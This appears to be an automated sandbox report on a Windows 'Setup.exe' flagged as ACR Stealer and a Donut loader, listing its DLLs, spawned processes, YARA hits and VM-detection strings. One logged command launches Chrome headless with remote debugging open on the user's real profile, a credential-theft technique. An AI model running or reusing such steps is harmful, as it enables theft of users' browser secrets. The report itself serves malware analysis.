      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031909F30_2_031909F3
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03195F400_2_03195F40
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317BF900_2_0317BF90
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03171E000_2_03171E00
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0318DED00_2_0318DED0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03194DB00_2_03194DB0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03178DE00_2_03178DE0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03175C700_2_03175C70
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03198CD00_2_03198CD0
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 02D93507 appears 84 times
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 031E1D23 appears 64 times
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 031A80B0 appears 49 times
      Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 02D59894 appears 47 times
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236
      Source: Setup.exeStatic PE information: invalid certificate
      Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: Setup.exe, 00000000.00000000.1677142282.00000000006F3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Setup.exe
      Source: Setup.exeBinary or memory string: OriginalFileName vs Setup.exe
      Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
      Source: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
      Source: chrome.exe, 00000002.00000002.3537859038.000001C7CC8C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
      Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@30/25@8/7
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D20A77 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,Thread32Next,0_2_02D20A77
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A20C0 CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,CoUninitialize,0_2_031A20C0
      Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680660089[1].htmJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6592
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\61b8b99b-7df5-44c1-8384-528c7cdab547Jump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};e
      Source: chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
      Source: Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
      Source: Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
      Source: Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
      Source: Setup.exeString found in binary or memory: /LoadInf=
      Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1264
      Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2140 --field-trial-handle=2028,i,5279315519537041474,755320844484096508,262144 --disable-features=PaintHolding /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeSection loaded: websocket.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: Setup.exeStatic file information: File size 76542479 > 1048576
      Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1800
      Source: Setup.exeStatic PE information: section name: .didata
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D301DB push edx; retf 0000h0_2_02D301EF
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D934E4 push ecx; ret 0_2_02D934F7
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031AE071 push cs; retf 0000h0_2_031AE072
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031E1D00 push ecx; ret 0_2_031E1D13
      Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Setup.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-78559
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03182080 FindFirstFileA,FindNextFileA,Sleep,0_2_03182080
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317DED0 FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_0317DED0
      Source: Amcache.hve.7.drBinary or memory string: VMware
      Source: Setup.exe, 00000000.00000003.1807976102.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk
      Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
